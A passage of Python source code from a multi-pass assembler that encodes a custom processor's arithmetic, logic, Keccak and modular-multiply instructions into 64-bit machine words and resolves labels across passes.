            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def source_field(token):
        # 19-bit source with a leading sign bit: label, pointer register, or
        # '#' immediate with an optional '#(factor)value' multiplier.
        nonlocal error
        if token in internal_labels:
            return sign_bit + "01" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return sign_bit + "1100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return sign_bit + "1110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return sign_bit + "1111" + format(int(token[3:]), "014b")
        # BUG FIX: use [0:1] slicing so a bare '#' (or empty) token reaches
        # the error path instead of raising IndexError as the original did.
        if token[0:1] == '#':
            immediate = token[1:]
            if immediate[0:1] == '(':
                factor_text, constant = immediate[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = immediate
            if constant in internal_labels:
                return sign_bit + "00" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return sign_bit + "00" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_b = source_field(command[2])
    operand_a = source_field(command[3])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b + operand_a
    return '00' + '0100010' + operand_o + operand_b + operand_a, 1
def instruction_bshift(command, internal_labels, final_pass=True):
    """Assemble a 'bshiftr' / 'bshiftl' big-number shift (opcodes 0100100 / 0100110).

    command: [mnemonic, destination, operand_b, operand_a].  The
    destination is a label or pointer register *rdN / *rmN / *rlN; each
    source additionally accepts a '#value' / '#(factor)value' immediate.
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting a final-pass error.
    """
    error = False
    opcode_table = {'bshiftr': '0100100', 'bshiftl': '0100110'}
    instruction_type = opcode_table.get(command[0])
    if instruction_type is None:
        error = True

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def source_field(token):
        # 19-bit source: label, pointer register, or '#' immediate with an
        # optional '#(factor)value' multiplier.
        nonlocal error
        if token in internal_labels:
            return "001" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "01100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "01110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "01111" + format(int(token[3:]), "014b")
        # BUG FIX: use [0:1] slicing so a bare '#' (or empty) token reaches
        # the error path instead of raising IndexError as the original did.
        if token[0:1] == '#':
            immediate = token[1:]
            if immediate[0:1] == '(':
                factor_text, constant = immediate[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = immediate
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_b = source_field(command[2])
    operand_a = source_field(command[3])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b + operand_a
    return '00' + instruction_type + operand_o + operand_b + operand_a, 1
def instruction_brot(command, internal_labels, final_pass=True):
    """Assemble a bit-rotate instruction ('brotr' / 'brotl') into one 64-bit word.

    command         -- token list: [mnemonic, destination, operand_b, operand_a]
    internal_labels -- mapping of label name -> numeric address
    final_pass      -- when False, an encoding error yields ("", 1) so an
                      earlier pass can keep counting instructions; when True
                      the bad command is printed and -1 is returned.

    Returns (machine_code, instruction_count) on success.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field: '0' + 16-bit label address, or
        # '1' + register-bank bits + 14-bit register number.
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field: '001' + label address, '011' + register bank +
        # register number, or '000' + 16-bit immediate.  An immediate is
        # '#value' or '#(factor)value', value being a label or digits.
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        if tok[0] == '#':
            if tok[1] == '(':
                scale, base = tok[2:].split(')', 1)
                scale = int(scale)
            else:
                scale, base = 1, tok[1:]
            if base in internal_labels:
                return '000' + format(internal_labels[base] * scale, '016b')
            if base.isdigit():
                return '000' + format(int(base) * scale, '016b')
        return None

    opcode = {'brotr': '0100101', 'brotl': '0100111'}.get(command[0])
    dest = enc_dest(command[1])
    src_b = enc_src(command[2])
    src_a = enc_src(command[3])
    if opcode is None or dest is None or src_b is None or src_a is None:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    return '00' + opcode + dest + src_b + src_a, 1
def instruction_bland(command, internal_labels, final_pass=True):
    """Assemble the bitwise-logical-AND instruction 'bland' (opcode 0101000)
    into one 64-bit word.

    command         -- token list: [mnemonic, destination, operand_b, operand_a]
    internal_labels -- mapping of label name -> numeric address
    final_pass      -- when False, an encoding error yields ("", 1); when True
                      the bad command is printed and -1 is returned.

    Returns (machine_code, instruction_count) on success.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field: '0' + 16-bit label address, or
        # '1' + register-bank bits + 14-bit register number.
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field: '001' + label address, '011' + register bank +
        # register number, or '000' + 16-bit immediate ('#value' or
        # '#(factor)value').
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        if tok[0] == '#':
            if tok[1] == '(':
                scale, base = tok[2:].split(')', 1)
                scale = int(scale)
            else:
                scale, base = 1, tok[1:]
            if base in internal_labels:
                return '000' + format(internal_labels[base] * scale, '016b')
            if base.isdigit():
                return '000' + format(int(base) * scale, '016b')
        return None

    dest = enc_dest(command[1])
    src_b = enc_src(command[2])
    src_a = enc_src(command[3])
    if dest is None or src_b is None or src_a is None:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    return '00' + '0101000' + dest + src_b + src_a, 1
def instruction_blor(command, internal_labels, final_pass=True):
    """Assemble the bitwise-logical-OR instruction 'blor' (opcode 0101001)
    into one 64-bit word.

    command         -- token list: [mnemonic, destination, operand_b, operand_a]
    internal_labels -- mapping of label name -> numeric address
    final_pass      -- when False, an encoding error yields ("", 1); when True
                      the bad command is printed and -1 is returned.

    Returns (machine_code, instruction_count) on success.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field: '0' + 16-bit label address, or
        # '1' + register-bank bits + 14-bit register number.
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field: '001' + label address, '011' + register bank +
        # register number, or '000' + 16-bit immediate ('#value' or
        # '#(factor)value').
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        if tok[0] == '#':
            if tok[1] == '(':
                scale, base = tok[2:].split(')', 1)
                scale = int(scale)
            else:
                scale, base = 1, tok[1:]
            if base in internal_labels:
                return '000' + format(internal_labels[base] * scale, '016b')
            if base.isdigit():
                return '000' + format(int(base) * scale, '016b')
        return None

    dest = enc_dest(command[1])
    src_b = enc_src(command[2])
    src_a = enc_src(command[3])
    if dest is None or src_b is None or src_a is None:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    return '00' + '0101001' + dest + src_b + src_a, 1
def instruction_blxor(command, internal_labels, final_pass=True):
    """Assemble the bitwise-logical-XOR instruction (opcode 0101010) into one
    64-bit word.

    Also handles the 'blnot' mnemonic, which is encoded as XOR against an
    all-ones 16-bit immediate (so command[3] is not consulted for it).

    command         -- token list: [mnemonic, destination, operand_b, operand_a]
                       (operand_a omitted for 'blnot')
    internal_labels -- mapping of label name -> numeric address
    final_pass      -- when False, an encoding error yields ("", 1); when True
                      the bad command is printed and -1 is returned.

    Returns (machine_code, instruction_count) on success.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field: '0' + 16-bit label address, or
        # '1' + register-bank bits + 14-bit register number.
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field: '001' + label address, '011' + register bank +
        # register number, or '000' + 16-bit immediate ('#value' or
        # '#(factor)value').
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        if tok[0] == '#':
            if tok[1] == '(':
                scale, base = tok[2:].split(')', 1)
                scale = int(scale)
            else:
                scale, base = 1, tok[1:]
            if base in internal_labels:
                return '000' + format(internal_labels[base] * scale, '016b')
            if base.isdigit():
                return '000' + format(int(base) * scale, '016b')
        return None

    dest = enc_dest(command[1])
    src_b = enc_src(command[2])
    if command[0] == 'blnot':
        # blnot = XOR with 0xFFFF, i.e. an all-ones immediate in operand a.
        src_a = '000' + format(2 ** 16 - 1, '016b')
    else:
        src_a = enc_src(command[3])
    if dest is None or src_b is None or src_a is None:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    return '00' + '0101010' + dest + src_b + src_a, 1
def instruction_fin(command, internal_labels, final_pass=True):
    """Assemble the 'fin' (finish) instruction: a fixed 64-bit word with
    opcode 0111111 and all-zero operand fields.

    The arguments are accepted only for interface parity with the other
    instruction_* assemblers; none of them affect the encoding, and this
    instruction cannot fail to assemble.

    Returns (machine_code, instruction_count).
    """
    word = '00' + '0111111' + '0' * 17 + '0' * 19 + '0' * 19
    return word, 1
def intruction_mmuld(command, internal_labels, final_pass=True):
    """Assemble the 8-slot 'mmuld' macro (opcode 0000000 on processor 01)
    into eight newline-separated 64-bit words.

    Operands arrive as (destination, source_b, source_a) triples, one triple
    per slot; unused slots keep all-zero operand fields.  This macro accepts
    labels and registers only — no '#' immediates.

    Returns (machine_code, 8) on success.  On an encoding error it returns
    ("", 0) when final_pass is False, otherwise prints the command and
    returns -1.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field (label address or register reference).
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field (label address or register reference).
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        return None

    dests = ['0' * 17] * 8
    srcs_b = ['0' * 19] * 8
    srcs_a = ['0' * 19] * 8
    failed = False
    tokens = command[1:]
    pos = 0
    slot = 0
    while pos < len(tokens):
        for fields, encoder in ((dests, enc_dest), (srcs_b, enc_src), (srcs_a, enc_src)):
            bits = encoder(tokens[pos])
            if bits is None:
                failed = True
            else:
                fields[slot] = bits
            pos += 1
        slot += 1
    if failed:
        if not final_pass:
            return "", 0
        print("Invalid instruction")
        print(command)
        return -1
    words = ['01' + '0000000' + dests[k] + srcs_b[k] + srcs_a[k] for k in range(8)]
    return '\n'.join(words), 8
def intruction_msqud(command, internal_labels, final_pass=True):
    """Assemble the 8-slot 'msqud' macro (opcode 0000001 on processor 01)
    into eight newline-separated 64-bit words.

    Operands arrive as (destination, source) pairs, one pair per slot; the
    source is encoded into both the b and a operand fields (a squaring form
    of the multiply encoding).  Unused slots keep all-zero operand fields.
    Labels and registers only — no '#' immediates.

    Returns (machine_code, 8) on success.  On an encoding error it returns
    ("", 0) when final_pass is False, otherwise prints the command and
    returns -1.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field (label address or register reference).
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field (label address or register reference).
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        return None

    dests = ['0' * 17] * 8
    srcs_b = ['0' * 19] * 8
    srcs_a = ['0' * 19] * 8
    failed = False
    tokens = command[1:]
    pos = 0
    slot = 0
    while pos < len(tokens):
        bits = enc_dest(tokens[pos])
        if bits is None:
            failed = True
        else:
            dests[slot] = bits
        pos += 1
        bits = enc_src(tokens[pos])
        if bits is None:
            failed = True
        else:
            # Same source in both operand fields: value * value.
            srcs_b[slot] = srcs_a[slot] = bits
        pos += 1
        slot += 1
    if failed:
        if not final_pass:
            return "", 0
        print("Invalid instruction")
        print(command)
        return -1
    words = ['01' + '0000001' + dests[k] + srcs_b[k] + srcs_a[k] for k in range(8)]
    return '\n'.join(words), 8
def intruction_mmulm(command, internal_labels, final_pass=True):
    """Assemble the 8-slot 'mmulm' macro (opcode 0000010 on processor 01)
    into eight newline-separated 64-bit words.

    Operands arrive as (destination, source_b, source_a) triples, one triple
    per slot; unused slots keep all-zero operand fields.  Labels and
    registers only — no '#' immediates.

    Returns (machine_code, 8) on success.  On an encoding error it returns
    ("", 0) when final_pass is False, otherwise prints the command and
    returns -1.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field (label address or register reference).
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field (label address or register reference).
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        return None

    dests = ['0' * 17] * 8
    srcs_b = ['0' * 19] * 8
    srcs_a = ['0' * 19] * 8
    failed = False
    tokens = command[1:]
    pos = 0
    slot = 0
    while pos < len(tokens):
        for fields, encoder in ((dests, enc_dest), (srcs_b, enc_src), (srcs_a, enc_src)):
            bits = encoder(tokens[pos])
            if bits is None:
                failed = True
            else:
                fields[slot] = bits
            pos += 1
        slot += 1
    if failed:
        if not final_pass:
            return "", 0
        print("Invalid instruction")
        print(command)
        return -1
    words = ['01' + '0000010' + dests[k] + srcs_b[k] + srcs_a[k] for k in range(8)]
    return '\n'.join(words), 8
def intruction_msqum(command, internal_labels, final_pass=True):
    """Assemble the 8-slot 'msqum' macro (opcode 0000011 on processor 01)
    into eight newline-separated 64-bit words.

    Operands arrive as (destination, source) pairs, one pair per slot; the
    source is encoded into both the b and a operand fields (a squaring form
    of the multiply encoding).  Unused slots keep all-zero operand fields.
    Labels and registers only — no '#' immediates.

    Returns (machine_code, 8) on success.  On an encoding error it returns
    ("", 0) when final_pass is False, otherwise prints the command and
    returns -1.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field (label address or register reference).
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field (label address or register reference).
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        return None

    dests = ['0' * 17] * 8
    srcs_b = ['0' * 19] * 8
    srcs_a = ['0' * 19] * 8
    failed = False
    tokens = command[1:]
    pos = 0
    slot = 0
    while pos < len(tokens):
        bits = enc_dest(tokens[pos])
        if bits is None:
            failed = True
        else:
            dests[slot] = bits
        pos += 1
        bits = enc_src(tokens[pos])
        if bits is None:
            failed = True
        else:
            # Same source in both operand fields: value * value.
            srcs_b[slot] = srcs_a[slot] = bits
        pos += 1
        slot += 1
    if failed:
        if not final_pass:
            return "", 0
        print("Invalid instruction")
        print(command)
        return -1
    words = ['01' + '0000011' + dests[k] + srcs_b[k] + srcs_a[k] for k in range(8)]
    return '\n'.join(words), 8
def instruction_madd_subd(command, internal_labels, final_pass=True):
    """Assemble the 4-slot add/subtract macro (opcode 0000100 on processor 01)
    into four newline-separated 64-bit words.

    Operands arrive as (destination, source_b, sign, source_a) groups, one
    group per slot.  The sign token must start with '+' or '-' and becomes
    the top bit of the source_a field ('1' for +, '0' for -).  Unused slots
    keep all-zero operand fields.  Labels and registers only — no '#'
    immediates.

    Returns (machine_code, 4) on success.  On an encoding error it returns
    ("", 0) when final_pass is False, otherwise prints the command and
    returns -1.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field (label address or register reference).
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field (label address or register reference).
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        return None

    dests = ['0' * 17] * 4
    srcs_b = ['0' * 19] * 4
    srcs_a = ['0' * 19] * 4
    failed = False
    tokens = command[1:]
    pos = 0
    slot = 0
    while pos < len(tokens):
        bits = enc_dest(tokens[pos])
        if bits is None:
            failed = True
        else:
            dests[slot] = bits
        pos += 1
        bits = enc_src(tokens[pos])
        if bits is None:
            failed = True
        else:
            srcs_b[slot] = bits
        pos += 1
        # Sign token: '+' -> 1, '-' -> 0 in the top bit of source_a.
        if tokens[pos][0] == '+':
            sign = '1'
        elif tokens[pos][0] == '-':
            sign = '0'
        else:
            # BUG FIX: the previous version left the sign variable unset on
            # this path, so an invalid sign token crashed with
            # UnboundLocalError (or silently reused a stale sign from an
            # earlier group) instead of reporting "Invalid instruction".
            sign = '0'
            failed = True
        pos += 1
        tok = tokens[pos]
        if tok in internal_labels:
            srcs_a[slot] = sign + '01' + format(internal_labels[tok], '016b')
        else:
            bank = reg_bits.get(tok[0:3])
            if bank is not None:
                srcs_a[slot] = sign + '11' + bank + format(int(tok[3:]), '014b')
            else:
                failed = True
        pos += 1
        slot += 1
    if failed:
        if not final_pass:
            return "", 0
        print("Invalid instruction")
        print(command)
        return -1
    words = ['01' + '0000100' + dests[k] + srcs_b[k] + srcs_a[k] for k in range(4)]
    return '\n'.join(words), 4
def instruction_mitred(command, internal_labels, final_pass=True):
    """Assemble the 4-slot 'mitred' macro (opcode 0000101 on processor 01)
    into four newline-separated 64-bit words.

    Operands arrive as (destination, source) pairs, one pair per slot; the
    source is encoded into the a operand field while the b field stays all
    zeros.  Unused slots keep all-zero operand fields.  Labels and registers
    only — no '#' immediates.

    Returns (machine_code, 4) on success.  On an encoding error it returns
    ("", 0) when final_pass is False, otherwise prints the command and
    returns -1.
    """
    reg_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}

    def enc_dest(tok):
        # 17-bit destination field (label address or register reference).
        if tok in internal_labels:
            return '0' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '1' + bank + format(int(tok[3:]), '014b')
        return None

    def enc_src(tok):
        # 19-bit source field (label address or register reference).
        if tok in internal_labels:
            return '001' + format(internal_labels[tok], '016b')
        bank = reg_bits.get(tok[0:3])
        if bank is not None:
            return '011' + bank + format(int(tok[3:]), '014b')
        return None

    dests = ['0' * 17] * 4
    srcs_a = ['0' * 19] * 4
    failed = False
    tokens = command[1:]
    pos = 0
    slot = 0
    while pos < len(tokens):
        bits = enc_dest(tokens[pos])
        if bits is None:
            failed = True
        else:
            dests[slot] = bits
        pos += 1
        bits = enc_src(tokens[pos])
        if bits is None:
            failed = True
        else:
            srcs_a[slot] = bits
        pos += 1
        slot += 1
    if failed:
        if not final_pass:
            return "", 0
        print("Invalid instruction")
        print(command)
        return -1
    words = ['01' + '0000101' + dests[k] + '0' * 19 + srcs_a[k] for k in range(4)]
    return '\n'.join(words), 4
def instruction_madd_subr(command, internal_labels, final_pass=True):
    """Assemble a 'madd_subr' command into four 64-bit machine-code words.

    command: tokenized assembly line; command[0] is the mnemonic, followed by
        groups of four operand tokens: destination (o), source (b), a '+'/'-'
        sign token, and the signed source (a).
    internal_labels: dict mapping label names to numeric addresses.
    final_pass: when False, any error yields ("", number_of_instructions) so a
        later pass may retry; when True, an error prints a diagnostic and
        returns -1 (matching the sibling instruction_* helpers).

    Returns (machine_code_string, number_of_instructions) on success; the
    string holds four newline-separated 64-bit words (last one without '\\n').
    """
    error_during_assembly = False
    number_of_instructions = 0
    machine_code_processor = '01'
    machine_code_intruction_type = '0000110'
    # All-zero default encodings for up to four instruction slots.
    machine_code_operand_o = ['0' * 17 for _ in range(4)]
    machine_code_operand_b = ['0' * 19 for _ in range(4)]
    machine_code_operand_a = ['0' * 19 for _ in range(4)]

    def _encode(operand, label_prefix, register_prefix):
        # Labels encode as <label_prefix><16-bit address>; register operands as
        # <register_prefix><2-bit bank><14-bit index>. Returns None on error.
        if operand in internal_labels:
            return label_prefix + format(internal_labels[operand], '016b')
        bank_bits = {'*rd': '00', '*rm': '10', '*rl': '11'}.get(operand[0:3])
        if bank_bits is None:
            return None
        return register_prefix + bank_bits + format(int(operand[3:]), '014b')

    all_operands = command[1:]
    i = 0
    j = 0
    while(i < len(all_operands)):
        # Bug fix: guard against a truncated operand group or more than four
        # groups; previously this raised IndexError instead of reporting the
        # error through the normal path.
        if (i + 3 >= len(all_operands)) or (j >= 4):
            error_during_assembly = True
            break
        encoded_o = _encode(all_operands[i], "0", "1")
        if encoded_o is None:
            error_during_assembly = True
        else:
            machine_code_operand_o[j] = encoded_o
        i += 1
        encoded_b = _encode(all_operands[i], "0" + "0" + "1", "0" + "1" + "1")
        if encoded_b is None:
            error_during_assembly = True
        else:
            machine_code_operand_b[j] = encoded_b
        i += 1
        if(all_operands[i][0] == '+'):
            machine_code_operand_a_sign = "1"
        elif(all_operands[i][0] == '-'):
            machine_code_operand_a_sign = "0"
        else:
            # Bug fix: previously the sign variable was left unassigned here,
            # raising UnboundLocalError before the error could be reported.
            machine_code_operand_a_sign = "0"
            error_during_assembly = True
        i += 1
        encoded_a = _encode(all_operands[i],
                            machine_code_operand_a_sign + "0" + "1",
                            machine_code_operand_a_sign + "1" + "1")
        if encoded_a is None:
            error_during_assembly = True
        else:
            machine_code_operand_a[j] = encoded_a
        i += 1
        j += 1
    if(error_during_assembly):
        if(not final_pass):
            return "", number_of_instructions
        else:
            print("Invalid instruction")
            print(command)
            return -1
    final_machine_code = ''
    # Emit the three leading words with a trailing newline, then the last one
    # without it (callers append their own '\n').
    for i in range(3):
        machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
        final_machine_code = final_machine_code + machine_code + '\n'
        number_of_instructions += 1
    machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[3] + machine_code_operand_b[3] + machine_code_operand_a[3]
    final_machine_code = final_machine_code + machine_code
    number_of_instructions += 1
    return final_machine_code, number_of_instructions
# Dispatch table: mnemonic -> assembler function. Several mnemonics share one
# handler that inspects the mnemonic itself to choose the exact encoding
# (e.g. 'jump'/'jumpeq', 'bshiftr'/'bshiftl', 'brotr'/'brotl').
# NOTE: the 'intruction_*' spellings are the actual names of those helpers.
instruction_opcodes = {'nop':instruction_nop,'jump':instruction_jumpeq,'jumpeq':instruction_jumpeq,'jumpl':instruction_jumpl,'jumpls':instruction_jumpl, 'jumpeql':instruction_jumpeql, 'jumpeqls':instruction_jumpeql,'push':instruction_push,'pop':instruction_pop,'pushf':instruction_pushf,'popf':instruction_popf,'pushm':instruction_pushm,'popm':instruction_popm,'copy':instruction_copy,'copyf':instruction_copyf,'copym':instruction_copym,'copya':instruction_copya,'lconstf':instruction_lconstf,'lconstm':instruction_lconstm,'call':instruction_call,'ret':instruction_ret,'keccak_init':instruction_keccak_init,'keccak_go':instruction_keccak_go,'badd':instruction_badd,'bsub':instruction_bsub,'bsmul':instruction_bsmul,'bsmuls':instruction_bsmul,'bshiftr':instruction_bshift,'bshiftl':instruction_bshift,'brotr':instruction_brot,'brotl':instruction_brot,'bland':instruction_bland,'blor':instruction_blor,'blxor':instruction_blxor,'blnot':instruction_blxor,'fin':instruction_fin,'mmuld':intruction_mmuld,'msqud':intruction_msqud,'mmulm':intruction_mmulm,'msqum':intruction_msqum,'madd_subd':instruction_madd_subd,'mitred':instruction_mitred,'madd_subr':instruction_madd_subr}
def remove_coments(line):
    """Strip an end-of-line ';' comment and surrounding whitespace from *line*."""
    # Everything from the first ';' onward is a comment in this assembly syntax.
    code_part, _, _ = line.partition(';')
    return code_part.strip()
def change_all_to_lowercase(line):
    """Lowercase *line* so mnemonics and labels compare case-insensitively."""
    lowered = line.lower()
    return lowered
def check_label_and_add_to_dicionary(line, internal_labels, program_counter, enable_show_program_labels):
    """Record a leading 'label:' (if present) at *program_counter* in
    *internal_labels* and return the remainder of the line (newline-terminated);
    lines without ':' are returned untouched."""
    if ':' not in line:
        return line
    # Only the first ':' separates the label; later ones stay in the body,
    # even though the current syntax does not permit them.
    label_part, remainder = line.split(':', 1)
    label = label_part.strip()
    internal_labels[label] = program_counter
    if enable_show_program_labels:
        print("Label : " + label + " at = " + str(program_counter))
    return remainder.strip() + "\n"
#
# First pass of assembly operation:
# - Remove all comments
# - Convert all letters to lowercase.
#
def assembly_file_remove_comments_change_to_lower_case(input_file, output_file):
    """First pass: drop comments and blank lines, lowercase what remains."""
    for raw_line in input_file:
        stripped = remove_coments(raw_line)
        if not stripped:
            # Line held only a comment or whitespace: emit nothing.
            continue
        output_file.write(change_all_to_lowercase(stripped) + '\n')
#
# Second pass of assembly operation:
# - Solve constant labels
#
def assembly_file_add_constant_labels(input_file, output_file, internal_labels):
    """Second pass: absorb 'name:value' constant definitions into
    *internal_labels*; every other line is copied through unchanged.

    Note: the value must immediately follow the ':' with no space, since
    str.isdigit() rejects leading whitespace — position labels keep a space
    (or no digits) and fall through to the next pass.
    """
    for line in input_file:
        if ':' not in line:
            output_file.write(line)
            continue
        name_part, value_part = line.strip().split(':', 1)
        if not value_part.isdigit():
            # A position label (or malformed constant): leave it for pass three.
            output_file.write(line)
            continue
        internal_labels[name_part.strip()] = int(value_part)
#
# Third pass of assembly operation:
# - Solve instructions with no label and write them in assembly
# - Find label positions and add them to a dictionary
#
def assembly_file_solve_instructions_add_position_labels(input_file, output_file, internal_labels, enable_show_program_labels):
    """Third pass: assemble every instruction whose operands are already
    resolvable, recording the program-counter position of each label.

    Instructions that cannot be mounted yet (e.g. forward labels) are written
    back in text form for the fourth pass. Returns -1 on an unknown opcode.
    """
    program_counter = 0
    for line in input_file:
        remainder = check_label_and_add_to_dicionary(line, internal_labels, program_counter, enable_show_program_labels)
        command = remainder.split()
        if (not command) or (command[0] not in instruction_opcodes):
            print("Not supported opcode")
            print(line)
            return -1
        # final_pass=False: unresolved operands yield ("", n) instead of -1.
        mounted_command, number_of_instructions = instruction_opcodes[command[0]](command, internal_labels, False)
        program_counter += number_of_instructions
        if mounted_command == "":
            # Could not assemble yet: defer the textual line to pass four.
            output_file.write(remainder)
            continue
        size_command_correct = True
        for mounted_line in mounted_command.splitlines():
            if (len(mounted_line) % 64) != 0:
                print("Wrong instruction size (" + str(len(mounted_command)) + ")")
                print('1')
                print(command)
                size_command_correct = False
        if size_command_correct:
            output_file.write(mounted_command + '\n')
#
# Fourth pass of assembly operation:
# - Solve remaining instructions.
#
def assembly_file_solve_remaining_instructions(input_file, output_file, internal_labels):
    """Fourth pass: assemble whatever the third pass left in text form and
    emit the final bit stream, verifying each output line is exactly one
    64-bit word (65 characters including the newline). Returns -1 on a
    size mismatch."""
    program_counter = 0
    for line in input_file:
        command = line.split()
        if command[0] not in instruction_opcodes:
            # Already-mounted machine code from pass three: pass it through.
            mounted_command = line
            program_counter += 1
        else:
            mounted_command, number_of_instructions = instruction_opcodes[command[0]](command, internal_labels)
            program_counter += number_of_instructions
            mounted_command = mounted_command + '\n'
        if len(mounted_command) != 65:
            print("Wrong instruction size (" + str(len(mounted_command)) + ")")
            print("2")
            print(command)
            return -1
        else:
            output_file.write(mounted_command)
    print("Program size in terms of instructions = " + str(program_counter))
def assembly_file_four_pass(input_file_name, output_file_name, enable_intermediate_files=False, enable_show_program_labels=False):
    """Run the four assembler passes over *input_file_name*, writing the final
    machine code to *output_file_name*.

